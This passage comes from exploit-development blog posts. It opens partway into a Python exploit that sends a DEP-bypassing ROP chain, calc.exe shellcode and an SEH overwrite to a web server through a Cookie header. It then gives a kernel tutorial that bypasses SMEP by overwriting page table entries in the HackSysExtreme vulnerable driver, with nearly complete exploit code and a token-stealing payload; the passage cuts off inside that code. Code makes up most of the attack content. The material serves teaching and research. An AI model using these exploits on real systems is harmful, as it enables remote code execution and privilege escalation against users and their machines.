crash += struct.pack('<L', 0x1002248c)		# mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory is negative fffffd2d bytes away from kernel32!GetStartupInfoA (which is in the virtual parameter placeholder currently)
# Popping 0xfffffd2d into EBX (which will be transferred into EDX. After value is in EDX, it will be added to EAX via EDX)

# Preparing EDX by clearing it out
crash += struct.pack('<L', 0x10022c4c)		# xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Beginning calculations for EBX
crash += struct.pack('<L', 0x100141c8)		# pop ebx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd2d)		# Negative distance to kernel32!WriteProcessMemory from kernel32!GetStartupInfoA

# Transferring EBX to EDX
crash += struct.pack('<L', 0x10022c1e)		# add edx, ebx ; pop ebx ; retn 0x10: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)		# Compensating for above ROP gadget

# Placing kernel32!WriteProcessMemory into EAX
crash += struct.pack('<L', 0x10015ce5)		# sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# ROP gadget compensations
crash += struct.pack('<L', 0x90909090)		# Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensation for retn 0x10 in previous ROP gadget

# Writing kernel32!WriteProcessMemory address to kernel32!WriteProcessMemory parameter placeholder

# Gadget to overwrite kernel32!VirtualParameter placeholder will do so at an offset of ECX + 0x8. Compensating for that now
# First, decrementing ECX by 0x8
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Overwriting kernel32!WriteProcessMemory parameter placeholder with actual address of kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x10021bfb)		# mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# The goal now is to load the address pointing to kernel32!WriteProcessMemory in ESP
# ECX contains an address + 0x8 bytes behind the kernel32!WriteProcessMemory pointer on the stack
# Increasing ECX by 8 bytes, moving it into EAX, and then exchanging EAX with ESP to fire off the ROP chain!
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

# Moving ECX into EAX
crash += struct.pack('<L', 0x1001fa0d)		# mov eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Exchanging EAX with ESP to fire off the call to kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x61c07ff8)		# xchg eax, esp ; ret: sqlite3.dll (non-ASLR enabled module)


# NOPs before shellcode
crash += "\x90" * 230

# calc.exe
# 195 bytes

crash += ("\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b"
"\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3"
"\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24"
"\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14"
"\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18"
"\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74"
"\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41"
"\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52"
"\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51"
"\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff"
"\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f"
"\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2"
"\x52\xff\xd0")

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only- no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)		# add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()

iF wE dIsAbLe cAlC wE wIlL mItIgAtE aLl tHe zEro dAyS

Conclusion

Had to think outside the box with a few of the COP gadgets, but overall this was very fun! Hopefully this was informative and helped out anyone looking to stay away from VirtualProtect() or VirtualAlloc().

Peace, love, and positivity :-)

Exploit Development: Leveraging Page Table Entries for Windows Kernel Exploitation

2 May 2020 at 00:00

Introduction

Taking the prerequisite knowledge from my last blog post, let’s talk about additional ways to bypass SMEP other than flipping the 20th bit of the CR4 register- or completely circumventing SMEP all together by bypassing NX in the kernel! This blog post in particular will leverage page table entry control bits to bypass these kernel mode mitigations, as well as leveraging additional vulnerabilities such as an arbitrary read to bypass page table randomization to achieve said goals.

Before We Begin

Morten Schenk of Offensive Security has done a lot of the leg work for shedding light on this topic to the public, namely at DefCon 25 and Black Hat 2017.

Although there has been some AMAZING research on this, I have not seen much in the way of practical blog posts showcasing this technique in the wild (that is, taking an exploit start to finish leveraging this technique in a blog post). Most of the research surrounding this topic, although absolutely brilliant, only explains how these mitigation bypasses work. This led to some issues for me when I started applying this research into actual exploitation, as I only had theory to go off of.

Since I had some trouble implementing said research into a practical example, I’m writing this blog post in hopes it will aid those looking for more detail on how to leverage these mitigation bypasses in a practical manner.

This blog post is going to utilize the HackSysExtreme vulnerable kernel driver to outline bypassing SMEP and bypassing NX in the kernel. The vulnerability class will be an arbitrary read/write primitive, which can write one QWORD to kernel mode memory per IOCTL routine.

Thank you to Ashfaq of HackSysTeam for this driver!

In addition to said information, these techniques will be utilized on a Windows 10 64-bit RS1 build. This is because Windows 10 RS2 has kernel Control Flow Guard (kCFG) enabled by default, which is beyond the scope of this post. This post simply aims to show the techniques used in today’s “modern exploitaiton era” to bypass SMEP or NX in kernel mode memory.

Why Go to the Mountain, If You Can Bring the Mountain to You?

The adage for the title of this section, comes from Spencer Pratt’s WriteProcessMemory() white paper about bypassing DEP. This saying, or adage, is extremely applicable to the method of bypassing SMEP through PTEs.

Let’s start with some psuedo code!

# Allocating user mode code
payload = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(shellcode)),            # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

---------------------------------------------------------

# Grabbing HalDispatchTable + 0x8 address
HalDispatchTable+0x8 = NTBASE + 0xFFFFFF

# Writing payload to HalDispatchTable + 0x8
www.What = payload
www.Where = HalDispatchTable + 0x8

---------------------------------------------------------

# Spawning SYSTEM shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!!!!"
os.system("cmd.exe /K cd C:\\")

Note, the above code is syntactically incorrect, but it is there nonetheless to help us understand what is going on.

Also, before moving on, write-what-where = arbitrary memory overwrite = arbitrary write primitive.

Carrying on, the above psuedo code snippet is allocating virtual memory in user mode, via VirtualAlloc(). Then, utilizing the write-what-where vulnerability in the kernel mode driver, the shellcode’s virtual address (residing in user mode), get’s written to nt!HalDispatchTable+0x8 (residing in kernel mode), which is a very common technique to use in an arbitrary memory overwrite situation.

Please refer to my last post on how this technique works.

As it stands now, execution of this code will result in an ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY Bug Check. This Bug Check is indicative of SMEP kicking in.

Letting the code execute, we can see this is the case.

Here, we can clearly see our shellcode has been allocated at 0x2620000

SMEP kicks in, and we can see the offending address is that of our user mode shellcode (Arg2 of PTE contents is highlighted as well. We will circle back to this in a moment).

Recall, from a previous blog of mine, that SMEP kicks in whenever code that resides in current privilege level (CPL 3) of the CPU (CPL 3 code = user mode code) is executed in context of CPL 0 (kernel mode).

SMEP is triggered in this case, as we are attempting to access the shellcode’s virtual address in user mode from nt!HalDispatchTable+0x8, which is in kernel mode.

But HOW is SMEP implemented is the real question.

SMEP is mandated/enabled through the OS via the 20th bit of the CR4 control register.

The 20th bit in the above image refers to the 1 in the beginning of CR4 register’s value of 0x170678, meaning SMEP is enabled on this system globally.

However, SMEP is ENFORCED on a per memory page basis, via the U/S PTE control bit. This is what we are going shift our focus to in this post.

Alex Ionescu gave a talk at Infiltrate 2015 about the implementation of SMEP on a per page basis.

Citing his slides, he explains that Intel has the following to say about SMEP enforcement on a per page basis.

“Any page level marked as supervisor (U/S=0) will result in treatment as supervisor for SMEP enforcement.”

Let’s take a look at the output of !pte in WinDbg of our user mode shellcode page to make sense of all of this!

What Intel means by the their statement in Alex’s talk, is that only ONE of the paging structure table entries (a page table entry) is needed to be set to kernel, in order for SMEP to not trigger. We do not need all 4 entries to be supervisor (kernel) mode!

This is wonderful for us, from an exploit development standpoint- as this GREATLY reduces our workload (we will see why shortly)!

Let’s learn how we can leverage this new knowledge, by first examining the current PTE control bits of our shellcode page:

  1. D- The “dirty” bit has been set, meaning a write to this address has occured (KERNELBASE!VirtualAlloc()).
  2. A- The “access” bit has been set, meaning this address has been referenced at some point.
  3. U- The “user” bit has been set here. When the memory manager unit reads in this address, it recognizes is as a user mode address. When this bit is 1, the page is user mode. When this bit is clear, the page is kernel mode.
  4. W- The “write” bit has been set here, meaning this memory page is writeable.
  5. E- The “executable” bit has been set here, meaning this memory page is executable.
  6. V- The “valid” bit is set here, meaning that the PTE is a valid PTE.

Notice that most of these control bits were set with our call earlier to KERNELBASE!VirtualAlloc() in the psuedo code snippet via the function’s arguments of flAllocationType and flProtect.

Where Do We Go From Here?

Let’s shift our focus to the PTE entry from the !pte command output in the last screenshot. We can see that our entry is that of a user mode page, from the U/S bit being set. However, what if we cleared this bit out?

If the U/S bit is set to 0, the page should become a kernel mode page, based on the aforementioned information. Let’s investigate this in WinDbg.

Rebooting our machine, we reallocate our shellcode in user mode.

The above image performs the following actions:

  1. Shows our shellcode in a user mode allocation at the virtual address 0xc60000
  2. Shows the current PTE and control bits for our shellcode memory page
  3. Uses ep in WinDbg to overwrite the pointer at 0xFFFFF98000006300 (this is the address of our PTE. When dereferenced, it contains the actual PTE control bits)
  4. Clears the PTE control bit for U/S by subtracting 4 from the PTE control bit contents.

    Note, I found this to be the correct value to clear the U/S bit through trial and error.

After the U/S bit is cleared out, our exploit continues by overwriting nt!HalDispatchTable+0x8 with the pointer to our shellcode.

The exploit continues, with a call to nt!KeQueryIntervalProfile(), which in turn, calls nt!HalDispatchTable+0x8

Stepping into the call qword ptr [nt!HalDispatchTable+0x8] instruction, we have hit our shellcode address and it has been loaded into RIP!

Executing the shellcode, results in manual bypass of SMEP!

Let’s refer back to the phraseology earlier in the post that uttered:

Why go to the mountain, if you can bring the mountain to you?

Notice how we didn’t “disable” SMEP like we did a few blog posts ago with ROP. All we did this time was just play by SMEP’s rules! We didn’t go to SMEP and try to disable it, instead, we brought our shellcode to SMEP and said “treat this as you normally treat kernel mode memory.”

This is great, we know we can bypass SMEP through this method! But the quesiton remains, how can we achieve this dynamically?

After all, we cannot just arbitrarily use WinDbg when exploiting other systems.

Calculating PTEs

The previously shown method of bypassing SMEP manually in WinDbg revolved around the fact we could dereference the PTE address of our shellcode page in memory and extract the control bits. The question now remains, can we do this dynamically without a debugger?

Our exploit not only gives us the ability to arbitrarily write, but it gives us the ability to arbitrarily read in data as well! We will be using this read primitive to our advantage.

Windows has an API for just about anything! Fetching the PTE for an associated virtual address is no different. Windows has an API called nt!MiGetPteAddress that performs a specific formula to retrieve the associated PTE of a memory page.

The above function performs the following instructions:

  1. Bitwise shifts the contents of the RCX register to the right by 9 bits
  2. Moves the value of 0x7FFFFFFFF8 into RAX
  3. Bitwise AND’s the values of RCX and RAX together
  4. Moves the value of 0xFFFFFE0000000000 into RAX
  5. Adds the values of RAX and RCX
  6. Performs a return out of the function

Let’s take a second to break this down by importance. First things first, the number 0xFFFFFE0000000000 looks like it could potentially be important- as it resembles a 64-bit virtual memory address.

Turns out, this is important. This number is actually a memory address, and it is the base address of all of the PTEs! Let’s talk about the base of the PTEs for a second and its significance.

Rebooting the machine and disassembling the function again, we notice something.

0xFFFFFE0000000000 has now changed to 0xFFFF800000000000. The base of the PTEs has changed, it seems.

This is due to page table randomization, a mitigation of Windows 10. Microsoft definitely had the right idea to implement this mitigation, but it is not much of a use to be honest if the attacker already has an abitrary read primitive.

An attacker needs an arbitrary read primitive in the first place to extract the contents of the PTE control bits by dereferencing the PTE of a given memory page.

If an attacker already has this ability, the adversary could just use the same primitive to read in nt!MiGetPteAddress+0x13, which, when dereferenced, contains the base of the PTEs.

Again, not ripping on Microsoft- I think they honestly have some of the best default OS exploit mitigations in the business. Just something I thought of.

The method of reusing an arbitrary read primitive is actually what we are going to do here! But before we do, let’s talk about the PTE formula one last time.

As we saw, a bitwise shift right operation is performed on the contents of the RCX register. That is because when this function is called, the virtual address for the PTE you would like to fetch gets loaded into RCX.

We can mimic this same behavior in Python also!

# Bitwise shift shellcode virtual address to the right 9 bits
shellcode_pte = shellcode_virtual_address >> 9

# Bitwise AND the bitwise shifted right shellcode virtual address with 0x7ffffffff8
shellcode_pte &= 0x7ffffffff8

# Add the base of the PTEs to the above value (which will need to be previously extracted with an arbitrary read)
shellcode_pte += base_of_ptes

The variable shellcode_pte will now contain the PTE for our shellcode page! We can demonstrate this behavior in WinDbg.

Sorry for the poor screenshot above in advance.

But as we can see, our version of the formula works- and we know can now dynamically fetch a PTE address! The only question remains, how do we dynamically dereference nt!MiGetPteAddress+0x13 with an arbitrary read?

Read, Read, Read!

To use our arbitrary read, we are actually going to use our arbitrary write!

Our write-what-where primitive allows us to write a pointer (the what) to a pointer (the where). The school of thought here, is to write the address of nt!MiGetPteAddress+0x13 (the what) to a c_void_p() data type, which is Python’s representation of a C void pointer.

What will happen here is the following:

  1. Since the write portion of the write-what-where writes a POINTER (a.k.a the write will take a memory address and dereference it- which results in extracting the contents of a pointer), we will write the value of nt!MiGetPteAddress+0x13 somewhere we control. The write primitive will extract what nt!MiGetPteAddress+0x13 points to, which is the base of the PTEs, and write it somewhere we can fetch the result!
  2. The “where” value in the write-what-were vulnerability will write the “what” value (base of the PTEs) to a pointer (a.k.a if the “what” value (base of the PTEs) gets written to 0xFFFFFFFFFFFFFFFF, that means 0xFFFFFFFFFFFFFFFF will now POINT to the “what” value, which is the base of the PTEs).

The thought process here is, if we write the base of the PTEs to OUR OWN pointer that we create- we can then dereference our pointer and extract the contents ourselves!

Here is how this all looks in Python!

First, we declare a structure (one member for the “what” value, one member for the “where” value)

# Fist structure, for obtaining nt!MiGetPteAddress+0x13 value
class WriteWhatWhere_PTE_Base(Structure):
    _fields_ = [
        ("What_PTE_Base", c_void_p),
        ("Where_PTE_Base", c_void_p)
    ]

Secondly, we fetch the memory address of nt!MiGetPteAddress+0x13

Note- your offset from the kernel base to this function may be different!

# Retrieving nt!MiGetPteAddress (Windows 10 RS1 offset)
nt_mi_get_pte_address = kernel_address + 0x51214

# Base of PTEs is located at nt!MiGetPteAddress + 0x13
pte_base = nt_mi_get_pte_address + 0x13

Thirdly, we declare a c_void_p() to store the value pointed to by nt!MiGetPteAddress+0x13

# Creating a pointer in which the contents of nt!MiGetPteAddress+0x13 will be stored in to
# Base of the PTEs are stored here
base_of_ptes_pointer = c_void_p()

Fourthly, we initialize our structure with our “what” value and our “where” value which writes what the actual address of nt!MiGetPteAddress+0x13 points to (the base of the PTEs) into our declared pointer.

# Write-what-where structure #1
www_pte_base = WriteWhatWhere_PTE_Base()
www_pte_base.What_PTE_Base = pte_base
www_pte_base.Where_PTE_Base = addressof(base_of_ptes_pointer)
www_pte_pointer = pointer(www_pte_base)

Notice the where is the address of the pointer addressof(base_of_ptes_pointer). This is because we don’t want to overwrite the c_void_p’s address with anything- we want to store the value inside of the pointer.

This will store the value inside of the pointer because our write-what-where primitive writes a “what” value to a pointer.

Next, we make an IOCTL call to the routine that jumps to the arbitrary write in the driver.

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_pointer,                    # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

A little Python ctypes magic here on dereferencing pointers.

# CTypes way of dereferencing a C void pointer
base_of_ptes = struct.unpack('<Q', base_of_ptes_pointer)[0]

The above snippet of code will read in the c_void_p() (which contains the base of the PTEs) and store it in the variable base_of_ptes.

Utilizing the base of the PTEs, we can now dynamically retrieve the location of our shellcode’s PTE by putting all of the code together!

We have successfully defeated page table randomization!

Read, Read, Read… Again!

Now that we have dynamically resolved the PTE address for our shellcode, we need to use our arbitrary read again to dereference the shellcode’s PTE and extract the PTE control bits so we can modify the page table entry to be kernel mode.

Using the same primitive as above, we can use Python again to dynamically retrieve all of this!

Firstly, we need to create another structure (again, one member for “what” and one member for “where”).

# Second structure, for obtaining the control bits for the PTE
class WriteWhatWhere_PTE_Control_Bits(Structure):
    _fields_ = [
        ("What_PTE_Control_Bits", c_void_p),
        ("Where_PTE_Control_Bits", c_void_p)
    ]

Secondly, we declare another c_void_p.

shellcode_pte_bits_pointer = c_void_p()

Thirdly, we initialize our structure with the appropriate variables

# Write-what-where structure #2
www_pte_bits = WriteWhatWhere_PTE_Control_Bits()
www_pte_bits.What_PTE_Control_Bits = shellcode_pte
www_pte_bits.Where_PTE_Control_Bits = addressof(shellcode_pte_bits_pointer)
www_pte_bits_pointer = pointer(www_pte_bits)

We then make another call to the IOCTL responsible for the vulnerability.

Before executing our updated exploit, let’s restart the computer to prove everything is working dynamically.

Our combined code executes- resulting in the extraction of the PTE control bits!

Awesome! All that is left now that is to modify the U/S bit of the PTE control bits and then execute our shellcode!

Write, Write, Write!

Now that we have read in all of the information we need, it is time to modify the PTE of the shellcode memory page. To do this, all we need to do is subtract the extracted PTE control bits by 4.

# Currently, the PTE control bit for U/S of the shellcode is that of a user mode memory page
# Flipping the U (user) bit to an S (supervisor/kernel) bit
shellcode_pte_control_bits_kernelmode = shellcode_pte_control_bits_usermode - 4

Now we have successfully gotten the value we would like to write over our current PTE, it is time to actually make the write.

To do this, we first setup a structure, just like the read primitive.

# Third structure, to overwrite the U (user) PTE control bit to an S (supervisor/kernel) bit
class WriteWhatWhere_PTE_Overwrite(Structure):
    _fields_ = [
        ("What_PTE_Overwrite", c_void_p),
        ("Where_PTE_Overwrite", c_void_p)
    ]

This time, however, we store the PTE bits in a pointer so when the write occurs, it writes the bits instead of trying to extract the memory address of 2000000046b0f867 - which is not a valid address.

# Need to store the PTE control bits as a pointer
# Using addressof(pte_overwrite_pointer) in Write-what-where structure #4 since a pointer to the PTE control bits are needed
pte_overwrite_pointer = c_void_p(shellcode_pte_control_bits_kernelmode)

Then, we initialize the structure again.

# Write-what-where structure #4
www_pte_overwrite = WriteWhatWhere_PTE_Overwrite()
www_pte_overwrite.What_PTE_Overwrite = addressof(pte_overwrite_pointer)
www_pte_overwrite.Where_PTE_Overwrite = shellcode_pte
www_pte_overwrite_pointer = pointer(www_pte_overwrite)

After everything is good to go, we make another IOCTL call to trigger the vulnerability, and we successfully turn our user mode page into a kernel mode page dynamically!

Goodbye, SMEP (v2 ft. PTE Overwrite)!

All that is left to do now is execute our shellcode via nt!HalDispatchTable+0x8 and nt!KeQueryIntervalProfile(). Since I have already done a post outlining how this works, I will link you to it so you can see how this actually executes our shellcode. This blog post assumes the reader has minimal knowledge of arbitrary memory overwrites to begin with.

Here is the final exploit, which can also be found on my GitHub.

# HackSysExtreme Vulnerable Driver Kernel Exploit (x64 Arbitrary Overwrite/SMEP Enabled)
# Windows 10 RS1 - SMEP Bypass via PTE Overwrite
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

# Fist structure, for obtaining nt!MiGetPteAddress+0x13 value
class WriteWhatWhere_PTE_Base(Structure):
    _fields_ = [
        ("What_PTE_Base", c_void_p),
        ("Where_PTE_Base", c_void_p)
    ]

# Second structure, for obtaining the control bits for the PTE
class WriteWhatWhere_PTE_Control_Bits(Structure):
    _fields_ = [
        ("What_PTE_Control_Bits", c_void_p),
        ("Where_PTE_Control_Bits", c_void_p)
    ]

# Third structure, to overwrite the U (user) PTE control bit to an S (supervisor/kernel) bit
class WriteWhatWhere_PTE_Overwrite(Structure):
    _fields_ = [
        ("What_PTE_Overwrite", c_void_p),
        ("Where_PTE_Overwrite", c_void_p)
    ]

# Fourth structure, to overwrite HalDispatchTable + 0x8 with kernel mode shellcode page
class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)
    ]

# Token stealing payload
payload = bytearray(
    "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
    "\x48\x8B\x80\xB8\x00\x00\x00"                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
    "\x48\x89\xC3"                                      # mov rbx,rax         ; Copy current process to rbx
    "\x48\x8B\x9B\xF0\x02\x00\x00"                      # mov rbx,[rbx+0x2f0] ; ActiveProcessLinks
    "\x48\x81\xEB\xF0\x02\x00\x00"                      # sub rbx,0x2f0       ; Go back to current process
    "\x48\x8B\x8B\xE8\x02\x00\x00"                      # mov rcx,[rbx+0x2e8] ; UniqueProcessId (PID)
    "\x48\x83\xF9\x04"                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
    "\x75\xE5"                                          # jnz 0x13            ; Loop until SYSTEM PID is found
    "\x48\x8B\x8B\x58\x03\x00\x00"                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358
    "\x80\xE1\xF0"                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
    "\x48\x89\x88\x58\x03\x00\x00"                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
    "\x48\x31\xC0"                                      # xor rax,rax         ; set NTSTATUS SUCCESS
    "\xC3"                                              # ret                 ; Done!
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying the shellcode in that region.
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Print update statement for shellcode location
print "[+] Shellcode is located at {0}".format(hex(ptr))

# Creating a pointer for the shellcode (write-what-where writes a pointer to a pointer)
# Using addressof(shellcode_pointer) in Write-what-where structure #5
shellcode_pointer = c_void_p(ptr)

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

# Print update for ntoskrnl.exe base address
print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Phase 1: Grab the base of the PTEs via nt!MiGetPteAddress

# Retrieving nt!MiGetPteAddress (Windows 10 RS1 offset)
nt_mi_get_pte_address = kernel_address + 0x51214

# Print update for nt!MiGetPteAddress address 
print "[+] nt!MiGetPteAddress is located at: {0}".format(hex(nt_mi_get_pte_address))

# Base of PTEs is located at nt!MiGetPteAddress + 0x13
pte_base = nt_mi_get_pte_address + 0x13

# Print update for nt!MiGetPteAddress+0x13 address
print "[+] nt!MiGetPteAddress+0x13 is located at: {0}".format(hex(pte_base))

# Creating a pointer in which the contents of nt!MiGetPteAddress+0x13 will be stored in to
# Base of the PTEs are stored here
base_of_ptes_pointer = c_void_p()

# Write-what-where structure #1
www_pte_base = WriteWhatWhere_PTE_Base()
www_pte_base.What_PTE_Base = pte_base
www_pte_base.Where_PTE_Base = addressof(base_of_ptes_pointer)
www_pte_pointer = pointer(www_pte_base)

# Getting handle to driver to return to DeviceIoControl() function
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_pointer,                    # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# CTypes way of dereferencing a C void pointer
base_of_ptes = struct.unpack('<Q', base_of_ptes_pointer)[0]

# Print update for PTE base
print "[+] Leaked base of PTEs!"
print "[+] Base of PTEs are located at: {0}".format(hex(base_of_ptes))

# Phase 2: Calculate the shellcode's PTE address

# Calculating the PTE for shellcode memory page
shellcode_pte = ptr >> 9
shellcode_pte &= 0x7ffffffff8
shellcode_pte += base_of_ptes

# Print update for Shellcode PTE
print "[+] PTE for the shellcode memory page is located at {0}".format(hex(shellcode_pte))

# Phase 3: Extract shellcode's PTE control bits

# Declaring C void pointer to store shellcode PTE control bits
shellcode_pte_bits_pointer = c_void_p()

# Write-what-where structure #2
www_pte_bits = WriteWhatWhere_PTE_Control_Bits()
www_pte_bits.What_PTE_Control_Bits = shellcode_pte
www_pte_bits.Where_PTE_Control_Bits = addressof(shellcode_pte_bits_pointer)
www_pte_bits_pointer = pointer(www_pte_bits)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_bits_pointer,               # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# CTypes way of dereferencing a C void pointer
shellcode_pte_control_bits_usermode = struct.unpack('<Q', shellcode_pte_bits_pointer)[0]

# Print update for PTE control bits
print "[+] PTE control bits for shellcode memory page: {:016x}".format(shellcode_pte_control_bits_usermode)

# Phase 4: Overwrite current PTE U/S bit for shellcode page with an S (supervisor/kernel)

# Currently, the PTE control bit for U/S of the shellcode is that of a user mode memory page
# Flipping the U (user) bit to an S (supervisor/kernel) bit
